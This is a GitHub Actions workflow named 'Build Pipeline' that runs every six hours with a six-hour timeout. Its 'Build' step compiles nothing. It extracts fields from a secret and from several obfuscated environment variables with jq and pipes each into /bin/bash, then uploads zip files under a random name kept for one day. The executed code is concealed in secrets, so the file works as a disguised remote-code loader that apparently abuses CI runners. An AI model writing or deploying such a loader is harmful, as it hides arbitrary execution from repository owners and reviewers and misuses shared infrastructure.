name: Build Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '35 1,7,13,19 * * *'
permissions:
  contents: read
  actions: read
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  operation:
    name: Main task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Build
        env:
          fmzc3: ${{ secrets.fmzc3 }}
        run: |
          printf '%s' "$fmzc3" | jq -r .wu8 | /bin/bash
          printf '%s' "$yo47422" | jq -r .d2247 | /bin/bash
          echo $avd0 | jq -r .zm75 | /bin/bash
          echo $utnc69264 | jq -r .a5 | /bin/bash

      - name: Archive output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: Mwt2aFvM
          path: "*.zip"
          retention-days: 1
